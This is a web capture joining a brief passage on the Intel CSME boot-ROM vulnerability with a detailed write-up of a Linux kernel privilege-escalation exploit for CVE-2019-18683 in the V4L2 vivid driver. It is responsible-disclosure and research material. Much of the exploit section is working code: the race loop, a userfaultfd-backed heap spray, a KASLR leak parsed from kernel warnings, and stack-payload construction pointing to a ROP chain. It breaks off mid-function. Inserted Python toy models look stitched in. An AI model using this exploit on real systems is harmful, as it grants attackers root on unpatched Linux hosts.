Unfortunately, no security system is perfect. Like all security architectures, Intel's had a weakness: the boot ROM, in this case. An early-stage vulnerability in ROM enables control over reading of the Chipset Key and generation of all other encryption keys. One of these keys is for the Integrity Control Value Blob (ICVB). With this key, attackers can forge the code of any Intel CSME firmware module in a way that authenticity checks cannot detect. This is functionally equivalent to a breach of the private key for the Intel CSME firmware digital signature, but limited to a specific platform.

The EPID issue is not too bad for the time being because the Chipset Key is stored inside the platform in the One-Time Programmable (OTP) Memory, and is encrypted. To fully compromise EPID, hackers would need to extract the hardware key used to encrypt the Chipset Key, which resides in Secure Key Storage (SKS). However, this key is not platform-specific. A single key is used for an entire generation of Intel chipsets. And since the ROM vulnerability allows seizing control of code execution before the hardware key generation mechanism in the SKS is locked, and the ROM vulnerability cannot be fixed, we believe that extracting this key is only a matter of time. When this happens, utter chaos will reign. Hardware IDs will be forged, digital content will be extracted, and data from encrypted hard disks will be decrypted.

The vulnerability discovered by Positive Technologies affects the Intel CSME boot ROM on all Intel chipsets and SoCs available today other than Ice Point (Generation 10). The vulnerability allows extracting the Chipset Key and manipulating part of the hardware key and the process of its generation. However, currently it is not possible to obtain that key's hardware component (which is hard-coded in the SKS) directly. The vulnerability also sets the stage for arbitrary code execution with zero-level privileges in Intel CSME.

We will provide more technical details in a full-length white paper to be published soon. We should point out that when our specialists contacted Intel PSIRT to report the vulnerability, Intel said the company was already aware of it (CVE-2019-0090). Intel understands they cannot fix the vulnerability in the ROM of existing hardware. So they are trying to block all possible exploitation vectors. The patch for CVE-2019-0090 addresses only one potential attack vector, involving the Integrated Sensors Hub (ISH). We think there might be many ways to exploit this vulnerability in ROM. Some of them might require local access; others need physical access.
As a sneak peek, here are a few words about the vulnerability itself:


1.     The vulnerability is present in both hardware and the firmware of the boot ROM. Most of the IOMMU mechanisms of MISA (Minute IA System Agent) providing access to SRAM (static memory) of Intel CSME for external DMA agents are disabled by default. We discovered this mistake by simply reading the documentation, as unimpressive as that may sound.
2.     Intel CSME firmware in the boot ROM first initializes the page directory and starts page translation. IOMMU activates only later. Therefore, there is a period when SRAM is susceptible to external DMA writes (from DMA to CSME, not to the processor main memory), and initialized page tables for Intel CSME are already in the SRAM.
3.     MISA IOMMU parameters are reset when Intel CSME is reset. After Intel CSME is reset, it again starts execution with the boot ROM.

Therefore, any platform device capable of performing DMA to Intel CSME static memory and resetting Intel CSME (or simply waiting for Intel CSME to come out of sleep mode) can modify system tables for Intel CSME pages, thereby seizing execution flow.

Author: Mark Ermolov, Positive Technologies

CVE-2019-18683: Exploiting a Linux kernel vulnerability in the V4L2 subsystem


This article discloses exploitation of CVE-2019-18683, which refers to multiple five-year-old race conditions in the V4L2 subsystem of the Linux kernel. I found and fixed them at the end of 2019. I gave a talk at OffensiveCon 2020 about it (slides).

Here I'm going to describe a PoC exploit for x86_64 that gains local privilege escalation from the kernel thread context (where the userspace is not mapped), bypassing KASLR, SMEP, and SMAP on Ubuntu Server 18.04.

First of all let's watch the demo video.

Vulnerabilities

These vulnerabilities are caused by incorrect mutex locking in the vivid driver of the V4L2 subsystem (drivers/media/platform/vivid). This driver doesn't require any special hardware. It is shipped in Ubuntu, Debian, Arch Linux, SUSE Linux Enterprise, and openSUSE as a kernel module (CONFIG_VIDEO_VIVID=m).

The vivid driver emulates video4linux hardware of various types: video capture, video output, radio receivers and transmitters, and software-defined radio receivers. These inputs and outputs behave exactly like real hardware devices. That allows using the driver as a test input for application development without requiring special hardware. The kernel documentation describes how to use the devices created by the vivid driver.

On Ubuntu, the devices created by the vivid driver are available to normal users since Ubuntu applies the RW ACL when the user is logged in:

a13x@ubuntu_server_1804:~$ getfacl /dev/video0
getfacl: Removing leading '/' from absolute path names
# file: dev/video0
# owner: root
# group: video
user::rw-
user:a13x:rw-
group::rw-
mask::rw-
other::---

(Un)fortunately, I don't know how to autoload the vulnerable driver, which limits the severity of these vulnerabilities. That's why the Linux kernel security team has allowed me to do full disclosure.

Bugs and fixes

I used the syzkaller fuzzer with custom modifications to the kernel source code and got a suspicious kernel crash. KASAN detected use-after-free during linked list manipulations in vid_cap_buf_queue(). Investigation of the reasons led me quite far from the memory corruption. Ultimately, I found that the same incorrect approach to locking is used in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), and sdr_cap_stop_streaming(). This resulted in three similar vulnerabilities.

These functions are called with vivid_dev.mutex locked when streaming is being stopped. The functions all make the same mistake when stopping their kthreads that need to lock this mutex as well. See the example from vivid_stop_generating_vid_cap():

/* shutdown control thread */
vivid_grab_controls(dev, false);
mutex_unlock(&dev->mutex);
kthread_stop(dev->kthread_vid_cap);
dev->kthread_vid_cap = NULL;
mutex_lock(&dev->mutex);

But when this mutex is unlocked, another vb2_fop_read() can lock it instead of the kthread and manipulate the buffer queue. That creates an opportunity for use-after-free later when streaming is started again.
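The window can be modeled in a few lines of Python (a toy model, not kernel code: the Lock stands in for dev->mutex and a plain list stands in for the buffer queue). While the "driver" has dropped the lock and is waiting, a concurrent "reader" grabs it and queues a buffer:

```python
import threading
import time

dev_mutex = threading.Lock()
queue = []  # stands in for vb2_queue.queued_list

def stop_streaming():
    # driver code path: unlock so the kthread can take the mutex and exit
    dev_mutex.release()
    time.sleep(0.05)          # window in which any other waiter may win
    dev_mutex.acquire()       # driver re-locks, unaware of what happened

def rogue_reader(won):
    # models a concurrent vb2_fop_read() queueing an unexpected buffer
    with dev_mutex:
        queue.append("unexpected vb2_buffer")
        won.set()

won = threading.Event()
dev_mutex.acquire()           # streaming-stop path holds the mutex initially
t = threading.Thread(target=rogue_reader, args=(won,))
t.start()                     # reader blocks on the mutex
stop_streaming()              # the unlock window lets the reader in
t.join()
print(queue)                  # → ['unexpected vb2_buffer']
```

In the real driver this stray buffer is what later turns into a use-after-free.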

To fix these issues, I did the following:

1. Avoided unlocking the mutex on streaming stop. For example, see the diff for vivid_stop_generating_vid_cap():

 /* shutdown control thread */
 vivid_grab_controls(dev, false);
-mutex_unlock(&dev->mutex);
 kthread_stop(dev->kthread_vid_cap);
 dev->kthread_vid_cap = NULL;
-mutex_lock(&dev->mutex);

2. Used mutex_trylock() with schedule_timeout_uninterruptible() in the loops of the vivid kthread handlers. The vivid_thread_vid_cap() handler was changed as follows:
 
 for (;;) {
 	try_to_freeze();
 	if (kthread_should_stop())
 		break;
-	mutex_lock(&dev->mutex);
+	if (!mutex_trylock(&dev->mutex)) {
+		schedule_timeout_uninterruptible(1);
+		continue;
+	}
 	...
 }

If the mutex is not available, the kthread sleeps for one jiffy and then tries again. If that happens on streaming stop, in the worst case the kthread goes to sleep several times and then hits the break on another loop iteration. So, in a certain sense, stopping the vivid kthread handlers was made lockless.
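The fixed loop structure can be sketched in Python (again a toy model: Lock.acquire(blocking=False) plays the role of mutex_trylock(), and a short sleep plays the role of schedule_timeout_uninterruptible(1)):

```python
import threading
import time

dev_mutex = threading.Lock()
stop = threading.Event()

def kthread_loop():
    # models the fixed vivid_thread_vid_cap() main loop
    while not stop.is_set():                      # kthread_should_stop()
        if not dev_mutex.acquire(blocking=False): # mutex_trylock()
            time.sleep(0.001)                     # sleep one "jiffy" and retry
            continue
        try:
            pass  # produce a frame
        finally:
            dev_mutex.release()

t = threading.Thread(target=kthread_loop)
t.start()
with dev_mutex:        # streaming-stop path holds the mutex the whole time
    time.sleep(0.01)   # the kthread keeps retrying instead of deadlocking
    stop.set()         # kthread_stop()
t.join(timeout=1)
print(t.is_alive())    # → False: the kthread exited without any unlock window
```

The point is that the stop path never has to drop the mutex, so the race window from the vulnerable version is gone.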

Sleeping is hard

I did responsible disclosure just after I finished my PoC exploit (I was at the Linux Security Summit in Lyon at the time). I sent the description of the vulnerabilities, fixing patch, and PoC crasher to security@kernel.org.

Linus Torvalds replied in less than two hours (great!). My communication with him was excellent this time. However, it took us four versions of the patch to do the right thing just because sleeping in kernel is not so easy.

The kthread in the first version of my patch didn't sleep at all:

if (!mutex_trylock(&dev->mutex))
	continue;

That solved the vulnerability but -- as Linus noticed -- also introduced a busy-loop that can cause a deadlock on a non-preemptible kernel. I tested the PoC crasher that I sent them on the kernel with CONFIG_PREEMPT_NONE=y. It managed to cause a deadlock after some time, just like Linus had said.

So I returned with a second version of the patch, in which the kthread does the following:

if (!mutex_trylock(&dev->mutex)) {
	schedule_timeout_interruptible(1);
	continue;
}

I used schedule_timeout_interruptible() because it is used in other parts of vivid-kthread-cap.c. The maintainers asked to use schedule_timeout() for cleaner code because kernel threads shouldn't normally take signals. I changed it, tested the patch, and sent the third version.

But finally after my full disclosure, Linus discovered that we were wrong yet again:

I just realized that this too is wrong. It _works_, but because it doesn't actually set the task state to anything particular before scheduling, it's basically pointless. It calls the scheduler, but it won't delay anything, because the task stays runnable.
So what you presumably want to use is either "cond_resched()" (to make sure others get to run with no delay) or "schedule_timeout_uninterruptible(1)" which actually sets the process state to TASK_UNINTERRUPTIBLE.
The above works, but it's basically nonsensical.

So it was incorrect kernel API usage that worked fine by pure luck. I fixed that in the final version of the patch.

Later I prepared a patch for the mainline that adds a warning for detecting such API misuse. But Steven Rostedt explained that this is a known and intended side effect. So I came back with another patch that improves the schedule_timeout() annotation and describes its behavior more explicitly. That patch is scheduled for the mainline.

It turned out that sleeping is not so easy sometimes :)

Now let's talk about exploitation.

Winning the race

As described earlier, vivid_stop_generating_vid_cap() is called upon streaming stop. It unlocks the device mutex in the hope that vivid_thread_vid_cap() running in the kthread will lock it and exit the loop. Achieving memory corruption requires winning the race against this kthread.

Please see the code of the PoC crasher. If you want to test it on a vulnerable kernel, ensure that:

  • The vivid driver is loaded.
  • /dev/video0 is the V4L2 capture device (see the kernel logs).
  • You are logged in (Ubuntu applies the RW ACL that I mentioned already).

It creates two pthreads. They are bound to separate CPUs using sched_setaffinity for better racing:

cpu_set_t single_cpu;

CPU_ZERO(&single_cpu);
CPU_SET(cpu_n, &single_cpu);
ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
if (ret != 0)
	err_exit("[-] sched_setaffinity for a single CPU");
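As a side note, the same CPU pinning can be reproduced from Python via os.sched_setaffinity (Linux-only; this is an illustrative sketch for experimentation, not part of the exploit):

```python
import os

def pin_to_cpu(cpu_n: int) -> None:
    # Linux-only: analogous to the C sched_setaffinity() call above;
    # pid 0 means "the calling thread"
    os.sched_setaffinity(0, {cpu_n})

pin_to_cpu(0)
print(os.sched_getaffinity(0))  # {0} once pinned
```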

Here is the main part where the racing happens:

for (loop = 0; loop < LOOP_N; loop++) {
	int fd = 0;

	fd = open("/dev/video0", O_RDWR);
	if (fd < 0)
		err_exit("[-] open /dev/video0");

	read(fd, buf, 0xfffded);
	close(fd);
}

vid_cap_start_streaming(), which starts streaming, is called by V4L2 during vb2_core_streamon() on first reading from the opened file descriptor.

vivid_stop_generating_vid_cap(), which stops streaming, is called by V4L2 during __vb2_queue_cancel() on release of the last reference to the file.

If another reading "wins" the race against the kthread, it calls vb2_core_qbuf(), which adds an unexpected vb2_buffer to vb2_queue.queued_list. This is how memory corruption begins.

Deceived V4L2 subsystem

Meanwhile, streaming has fully stopped. The last reference to /dev/video0 is released and the V4L2 subsystem calls vb2_core_queue_release(), which is responsible for freeing up resources. It in turn calls __vb2_queue_free(), which frees our vb2_buffer that was added to the queue when the exploit won the race.

But the driver is not aware of this and still holds a reference to the freed object. When streaming is started again on the next exploit loop iteration, the vivid driver touches the freed object, which is caught by KASAN:

==================================================================
BUG: KASAN: use-after-free in vid_cap_buf_queue+0x188/0x1c0
Write of size 8 at addr ffff8880798223a0 by task v4l2-crasher/300

CPU: 1 PID: 300 Comm: v4l2-crasher Tainted: G        W 5.4.0-rc2+ #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-buildvm-ppc64le-16.ppc.fedoraproject.org-3.fc31 04/01/2014
Call Trace:
 dump_stack+0x5b/0x90
 print_address_description.constprop.0+0x16/0x200
 ? vid_cap_buf_queue+0x188/0x1c0
 ? vid_cap_buf_queue+0x188/0x1c0
 __kasan_report.cold+0x1a/0x41
 ? vid_cap_buf_queue+0x188/0x1c0
 kasan_report+0xe/0x20
 vid_cap_buf_queue+0x188/0x1c0
 vb2_start_streaming+0x222/0x460
 vb2_core_streamon+0x111/0x240
 __vb2_init_fileio+0x816/0xa30
 __vb2_perform_fileio+0xa88/0x1120
 ? kmsg_dump_rewind_nolock+0xd4/0xd4
 ? vb2_thread_start+0x300/0x300
 ? __mutex_lock_interruptible_slowpath+0x10/0x10
 vb2_fop_read+0x249/0x3e0
 v4l2_read+0x1bf/0x240
 vfs_read+0xf6/0x2d0
 ksys_read+0xe8/0x1c0
 ? kernel_write+0x120/0x120
 ? __ia32_sys_nanosleep_time32+0x1c0/0x1c0
 ? do_user_addr_fault+0x433/0x8d0
 do_syscall_64+0x89/0x2e0
 ? prepare_exit_to_usermode+0xec/0x190
 entry_SYSCALL_64_after_hwframe+0x44/0xa9
RIP: 0033:0x7f3a8ec8222d
Code: c1 20 00 00 75 10 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 4e fc ff ff 48 89 04 24 b8 00 00 00 00 0f 05 <48> 8b 3c 24 48 89 c2 e8 97 fc ff ff 48 89 d0 48 83 c4 08 48 3d 01
RSP: 002b:00007f3a8d0d0e80 EFLAGS: 00000293 ORIG_RAX: 0000000000000000
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f3a8ec8222d
RDX: 0000000000fffded RSI: 00007f3a8d8d3000 RDI: 0000000000000003
RBP: 00007f3a8d0d0f50 R08: 0000000000000001 R09: 0000000000000026
R10: 000000000000060e R11: 0000000000000293 R12: 00007ffc8d26495e
R13: 00007ffc8d26495f R14: 00007f3a8c8d1000 R15: 0000000000000003

Allocated by task 299:
 save_stack+0x1b/0x80
 __kasan_kmalloc.constprop.0+0xc2/0xd0
 __vb2_queue_alloc+0xd9/0xf20
 vb2_core_reqbufs+0x569/0xb10
 __vb2_init_fileio+0x359/0xa30
 __vb2_perform_fileio+0xa88/0x1120
 vb2_fop_read+0x249/0x3e0
 v4l2_read+0x1bf/0x240
 vfs_read+0xf6/0x2d0
 ksys_read+0xe8/0x1c0
 do_syscall_64+0x89/0x2e0
 entry_SYSCALL_64_after_hwframe+0x44/0xa9

Freed by task 300:
 save_stack+0x1b/0x80
 __kasan_slab_free+0x12c/0x170
 kfree+0x90/0x240
 __vb2_queue_free+0x686/0x7b0
 vb2_core_reqbufs.cold+0x1d/0x8a
 __vb2_cleanup_fileio+0xe9/0x140
 vb2_core_queue_release+0x12/0x70
 _vb2_fop_release+0x20d/0x290
 v4l2_release+0x295/0x330
 __fput+0x245/0x780
 task_work_run+0x126/0x1b0
 exit_to_usermode_loop+0x102/0x120
 do_syscall_64+0x234/0x2e0
 entry_SYSCALL_64_after_hwframe+0x44/0xa9

The buggy address belongs to the object at ffff888079822000
 which belongs to the cache kmalloc-1k of size 1024
The buggy address is located 928 bytes inside of
 1024-byte region [ffff888079822000, ffff888079822400)
The buggy address belongs to the page:
page:ffffea0001e60800 refcount:1 mapcount:0 mapping:ffff88802dc03180 index:0xffff888079827800 compound_mapcount: 0
flags: 0x500000000010200(slab|head)
raw: 0500000000010200 ffffea0001e77c00 0000000200000002 ffff88802dc03180
raw: ffff888079827800 000000008010000c 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
 ffff888079822280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff888079822300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>ffff888079822380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
                               ^
 ffff888079822400: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 ffff888079822480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
==================================================================

As you can see from this report, use-after-free happens on the object from the kmalloc-1k cache. That object is relatively big, so its slab cache is not so heavily used in the kernel. That makes heap spraying more precise (good for exploitation).

Heap spraying

Heap spraying is an exploitation technique that aims to put controlled bytes at a predetermined memory location on the heap. Heap spraying usually involves allocating multiple heap objects with controlled contents and abusing some allocator behavior pattern.

Heap spraying for exploiting use-after-free in the Linux kernel relies on the fact that on kmalloc(), the slab allocator returns the address to the memory that was recently freed (for better performance). Allocating a kernel object with the same size and controlled contents allows overwriting the vulnerable freed object:
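The allocator behavior being abused can be shown with a toy LIFO freelist model (a simplification of SLUB's per-CPU freelists for one size class; the addresses are of course made up):

```python
# toy LIFO freelist mimicking the slab allocator for one size class
freelist = []
next_addr = 0x1000

def kmalloc():
    global next_addr
    if freelist:
        return freelist.pop()   # most recently freed chunk comes back first
    next_addr += 0x400          # otherwise hand out a fresh 1k slot
    return next_addr

def kfree(addr):
    freelist.append(addr)

victim = kmalloc()      # the vulnerable vb2_buffer
kfree(victim)           # freed by __vb2_queue_free()
spray = kmalloc()       # the attacker's setxattr() allocation
print(spray == victim)  # → True: controlled data now sits behind the stale pointer
```

The real kernel heap is noisier than this (hence the need for many spray allocations), but the reuse of recently freed memory is the property that makes the technique work.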



There is an excellent post by Vitaly Nikolenko, in which he shares a very powerful technique that uses userfaultfd() and setxattr() for exploiting use-after-free in the Linux kernel. I highly recommend reading that article before proceeding with my write-up. The main idea is that userfaultfd() gives you control over the lifetime of data that is allocated by setxattr() in the kernelspace. I used that trick in various forms for exploiting this vulnerability.

As I described earlier, the vb2_buffer is freed on streaming stop and is used later, on the next streaming start. That is very convenient -- my heap spray can simply go at the end of the racing loop iteration! But there is one catch: the vulnerable vb2_buffer is not the last one freed by __vb2_queue_free(). In other words, the next kmalloc() doesn't return the needed pointer. That's why having only one allocation is not enough for overwriting the vulnerable object, making it important to really "spray".

That is not so easy with Vitaly's technique: the spraying process with setxattr() hangs until the userfaultfd() page fault handler calls the UFFDIO_COPY ioctl. If we want the setxattr() allocations to be persistent, we should never call this ioctl. I bypassed that restriction by creating a pool of pthreads: each spraying pthread calls setxattr() powered by userfaultfd() and hangs. I also distribute spraying pthreads among different CPUs using sched_setaffinity() to make allocations in all slab caches (they are per-CPU).

And now let's continue with describing the payload that I created for overwriting the vulnerable vb2_buffer.

I'm going to tell you about the development of the payload in chronological order.

Control flow hijack for V4L2 subsystem

V4L2 is a very complex Linux kernel subsystem. The following diagram (not to scale) describes the relationships between the objects that are part of the subsystem:


After my heap spray started to work fine, I spent a lot of (painful) time searching for a good exploit primitive that I could get with a vb2_buffer under my control. Unfortunately, I didn't manage to create an arbitrary write by crafting vb2_buffer.planes. Later I found a promising function pointer: vb2_buffer.vb2_queue->mem_ops->vaddr. Its prototype is pure luxury, I'd say!

Moreover, when vaddr() is called, it takes vb2_buffer.planes[0].mem_priv as an argument.

Unexpected troubles: kthread context

After discovering vb2_mem_ops.vaddr I started to investigate the minimal payload needed for me to get the V4L2 code to reach this function pointer.

First of all, I disabled SMAP (Supervisor Mode Access Prevention), SMEP (Supervisor Mode Execution Prevention), and KPTI (Kernel Page-Table Isolation). Then I made vb2_buffer.vb2_queue point to an mmap'ed memory area in the userspace. Dereferencing that pointer gave an "unable to handle page fault" error. It turned out that the pointer is dereferenced in the kernel thread context, where my userspace is not mapped at all.

So constructing the payload became a sticking point: I needed to place vb2_queue and vb2_mem_ops at known memory addresses that can be accessed from the kthread context.

Insight -- that's why we do it

During these experiments I dropped my kernel code changes that I had developed for deeper fuzzing. And I saw that my PoC exploit hit some V4L2 warning before performing use-after-free. This is the code in __vb2_queue_cancel() that gives the warning:

/*
 * If you see this warning, then the driver isn't cleaning up properly
 * in stop_streaming(). See the stop_streaming() documentation in
 * videobuf2-core.h for more information how buffers should be returned
 * to vb2 in stop_streaming().
 */
if (WARN_ON(atomic_read(&q->owned_by_drv_count))) {

I realized that I could parse the kernel warning information (which is available to regular users on Ubuntu Server). But I didn't know what to do with it. After some time I decided to ask my friend Andrey Konovalov aka xairy who is a well-known Linux kernel security researcher. He presented me with a cool idea -- to put the payload on the kernel stack and hold it there using userfaultfd(), similarly to Vitaly's heap spray. We can do this with any syscall that moves data to the kernel stack using copy_from_user(). I believe this to be a novel technique, so I will refer to it as xairy's method to credit my friend.

I understood that I could get the kernel stack location by parsing the warning and then anticipate the future address of my payload. This was the most sublime moment of my entire quest. These are the moments that make all the effort worth it, right?

Now let's collect all the exploit steps together before describing the payload bytes. The described method allows bypassing SMAP, SMEP, and KASLR on Ubuntu Server 18.04.

Exploit orchestra

For this quite complex exploit I created a pool of pthreads and orchestrated them using synchronization at pthread_barriers. Here are the pthread_barriers that mark the main reference points during exploitation:

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define THREADS_N 50

pthread_barrier_t barrier_prepare;
pthread_barrier_t barrier_race;
pthread_barrier_t barrier_parse;
pthread_barrier_t barrier_kstack;
pthread_barrier_t barrier_spray;
pthread_barrier_t barrier_fatality;

...

ret = pthread_barrier_init(&barrier_prepare, NULL, THREADS_N - 3);
if (ret != 0)
	err_exit("[-] pthread_barrier_init");

ret = pthread_barrier_init(&barrier_race, NULL, 2);
if (ret != 0)
	err_exit("[-] pthread_barrier_init");

ret = pthread_barrier_init(&barrier_parse, NULL, 3);
if (ret != 0)
	err_exit("[-] pthread_barrier_init");

ret = pthread_barrier_init(&barrier_kstack, NULL, 3);
if (ret != 0)
	err_exit("[-] pthread_barrier_init");

ret = pthread_barrier_init(&barrier_spray, NULL, THREADS_N - 5);
if (ret != 0)
	err_exit("[-] pthread_barrier_init");

ret = pthread_barrier_init(&barrier_fatality, NULL, 2);
if (ret != 0)
	err_exit("[-] pthread_barrier_init");

Each pthread has a special role. In this particular exploit I have 50 pthreads in five different roles:

  •  2 racer pthreads
  •  (THREADS_N - 6) = 44 sprayer pthreads, which hang on setxattr() powered by userfaultfd()
  •  2 pthreads for userfaultfd() page fault handling
  •  1 pthread for parsing /dev/kmsg and adapting the payload
  •  1 fatality pthread, which triggers the privilege escalation

The pthreads with different roles synchronize at a different set of barriers. The last parameter of pthread_barrier_init() specifies the number of pthreads that must call pthread_barrier_wait() for that particular barrier before they can continue all together.
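The same rendezvous pattern is available in Python as threading.Barrier, which makes it easy to experiment with; a minimal sketch of a two-party barrier (like barrier_race above):

```python
import threading

results = []
barrier = threading.Barrier(2)   # like pthread_barrier_init(..., 2)

def racer(name):
    barrier.wait()               # both racers are released at the same instant
    results.append(name)

threads = [threading.Thread(target=racer, args=(n,))
           for n in ("racer0", "racer1")]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(sorted(results))  # → ['racer0', 'racer1']
```

Neither racer proceeds past wait() until both have arrived, which is exactly the property the exploit relies on to line up its pthreads at each stage.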


The following table describes all the pthreads of this exploit, their work, and synchronization via pthread_barrier_wait(). The barriers are listed in chronological order. The table is best read row by row, remembering that all the pthreads work in parallel.



Here is the exploit debug output perfectly demonstrating the workflow described in the table:

a13x@ubuntu_server_1804:~$ uname -a
Linux ubuntu_server_1804 4.15.0-66-generic #75-Ubuntu SMP Tue Oct 1 05:24:09 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
a13x@ubuntu_server_1804:~$
a13x@ubuntu_server_1804:~$ ./v4l2-pwn
begin as: uid=1000, euid=1000
Prepare the payload:
 [+] payload for_heap is mmaped to 0x7f8c9e9b0000
 [+] vivid_buffer of size 504 is at 0x7f8c9e9b0e08
 [+] payload for_stack is mmaped to 0x7f8c9e9ae000
 [+] timex of size 208 is at 0x7f8c9e9aef38
 [+] userfaultfd #1 is configured: start 0x7f8c9e9b1000, len 0x1000
 [+] userfaultfd #2 is configured: start 0x7f8c9e9af000, len 0x1000
We have 4 CPUs for racing; now create 50 pthreads...
 [+] racer 1 is ready on CPU 1
 [+] fatality is ready
 [+] racer 0 is ready on CPU 0
 [+] fault_handler for uffd 3 is ready
 [+] kmsg parser is ready
 [+] fault_handler for uffd 4 is ready
 [+] 44 sprayers are ready (passed the barrier)
Racer 1: GO!
Racer 0: GO!
 [+] found rsp "ffffb93600eefd60" in kmsg
 [+] kernel stack top is 0xffffb93600ef0000
 [+] found r11 "ffffffff9d15d80d" in kmsg
 [+] kaslr_offset is 0x1a800000
Adapt payloads knowing that kstack is 0xffffb93600ef0000, kaslr_offset 0x1a800000:
  vb2_queue of size 560 will be at 0xffffb93600eefe30, userspace 0x7f8c9e9aef38
  mem_ops ptr will be at 0xffffb93600eefe68, userspace 0x7f8c9e9aef70, value 0xffffb93600eefe70
  mem_ops struct of size 120 will be at 0xffffb93600eefe70, userspace 0x7f8c9e9aef78, vaddr 0xffffffff9bc725f1 at 0x7f8c9e9aefd0
  rop chain will be at 0xffffb93600eefe80, userspace 0x7f8c9e9aef88
  cmd will be at ffffb93600eefedc, userspace 0x7f8c9e9aefe4
 [+] the payload for kernel heap and stack is ready. Put it.
 [+] UFFD_EVENT_PAGEFAULT for uffd 4 on address = 0x7f8c9e9af000: 2 faults collected
 [+] fault_handler for uffd 4 passed the barrier
 [+] UFFD_EVENT_PAGEFAULT for uffd 3 on address = 0x7f8c9e9b1000: 44 faults collected
 [+] fault_handler for uffd 3 passed the barrier
 [+] and now fatality: run the shell command as root!

Anatomy of the exploit payload

In the previous section, I described orchestration of the exploit pthreads. I mentioned that the exploit payload is created in two locations:

  1. In the kernel heap by sprayer pthreads using setxattr() syscall powered by userfaultfd().
  2. In the kernel stack by racer pthreads using adjtimex() syscall powered by userfaultfd(). That syscall is chosen because it performs copy_from_user() to the kernel stack.

The exploit payload consists of three parts:

  1. vb2_buffer in kernel heap
  2. vb2_queue in kernel stack
  3. vb2_mem_ops in kernel stack

Now see the code that creates this payload. At the beginning of the exploit, I prepare the payload contents in the userspace.

That memory is for the setxattr() syscall, which will put it on the kernel heap:

#define MMAP_SZ 0x2000
#define PAYLOAD_SZ 504

void init_heap_payload()
{
	struct vivid_buffer *vbuf = NULL;
	struct vb2_plane *vplane = NULL;

	for_heap = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE,
			MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (for_heap == MAP_FAILED)
		err_exit("[-] mmap");
	printf(" [+] payload for_heap is mmaped to %p\n", for_heap);

	/* Don't touch the second page (needed for userfaultfd) */
	memset(for_heap, 0, PAGE_SIZE);

	xattr_addr = for_heap + PAGE_SIZE - PAYLOAD_SZ;
	vbuf = (struct vivid_buffer *)xattr_addr;
	vbuf->vb.vb2_buf.num_planes = 1;
	vplane = vbuf->vb.vb2_buf.planes;
	vplane->bytesused = 16;
	vplane->length = 16;
	vplane->min_length = 16;
	printf(" [+] vivid_buffer of size %lu is at %p\n",
	       sizeof(struct vivid_buffer), vbuf);
}

And that memory is for the adjtimex() syscall, which will put it on the kernel stack:

#define PAYLOAD2_SZ 208

void init_stack_payload()
{
    for_stack = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE,
                     MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (for_stack == MAP_FAILED)
        err_exit("[-] mmap");
    printf(" [+] payload for_stack is mmaped to %p\n", for_stack);

    /* Don't touch the second page (needed for userfaultfd) */
    memset(for_stack, 0, PAGE_SIZE);

    timex_addr = for_stack + PAGE_SIZE - PAYLOAD2_SZ + 8;
    printf(" [+] timex of size %lu is at %p\n",
           sizeof(struct timex), timex_addr);
}

As I described earlier, after hitting the race condition the kmsg parsing pthread extracts the following information from the kernel warning:

  • The RSP value to calculate the address of kernel stack top.
  • The R11 value that points to some constant location in the kernel code. This value helps to calculate the KASLR offset:

#define R11_COMPONENT_TO_KASLR_OFFSET 0x195d80d
#define KERNEL_TEXT_BASE 0xffffffff81000000

kaslr_offset = strtoul(r11, NULL, 16);
kaslr_offset -= R11_COMPONENT_TO_KASLR_OFFSET;
if (kaslr_offset < KERNEL_TEXT_BASE) {
    printf("bad kernel text base 0x%lx\n", kaslr_offset);
    err_exit("[-] kmsg parsing for r11");
}
kaslr_offset -= KERNEL_TEXT_BASE;
 
Then the kmsg parsing pthread adapts the heap and stack payloads. This is the most interesting and complex part! To understand it, have a look at the debug output of this code (posted above).

#define TIMEX_STACK_OFFSET 0x1d0
#define LIST_OFFSET 24
#define OPS_OFFSET 64
#define CMD_OFFSET 172

struct vivid_buffer *vbuf = (struct vivid_buffer *)xattr_addr;
struct vb2_queue *vq = NULL;
struct vb2_mem_ops *memops = NULL;
struct vb2_plane *vplane = NULL;

printf("Adapt payloads knowing that kstack is 0x%lx, kaslr_offset 0x%lx:\n",
       kstack, kaslr_offset);

/* point to future position of vb2_queue in timex payload on kernel stack */
vbuf->vb.vb2_buf.vb2_queue = (struct vb2_queue *)(kstack - TIMEX_STACK_OFFSET);
vq = (struct vb2_queue *)timex_addr;
printf("  vb2_queue of size %lu will be at %p, userspace %p\n",
       sizeof(struct vb2_queue), vbuf->vb.vb2_buf.vb2_queue, vq);

/* just to survive vivid list operations */
vbuf->list.next = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET);
vbuf->list.prev = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET);

/*
 * point to future position of vb2_mem_ops in timex payload on kernel stack;
 * mem_ops offset is 0x38, be careful with OPS_OFFSET
 */
vq->mem_ops = (struct vb2_mem_ops *)(kstack - TIMEX_STACK_OFFSET + OPS_OFFSET);
printf("  mem_ops ptr will be at %p, userspace %p, value %p\n",
       &(vbuf->vb.vb2_buf.vb2_queue->mem_ops), &(vq->mem_ops), vq->mem_ops);

memops = (struct vb2_mem_ops *)(timex_addr + OPS_OFFSET);
/* vaddr offset is 0x58, be careful with ROP_CHAIN_OFFSET */
memops->vaddr = (void *)ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET + kaslr_offset;
printf("  mem_ops struct of size %lu will be at %p, userspace %p, vaddr %p at %p\n",
       sizeof(struct vb2_mem_ops), vq->mem_ops, memops,
